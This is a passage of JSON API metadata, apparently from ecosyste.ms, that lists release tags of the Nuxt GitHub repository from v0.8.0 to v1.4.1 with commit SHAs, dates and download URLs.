t/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manife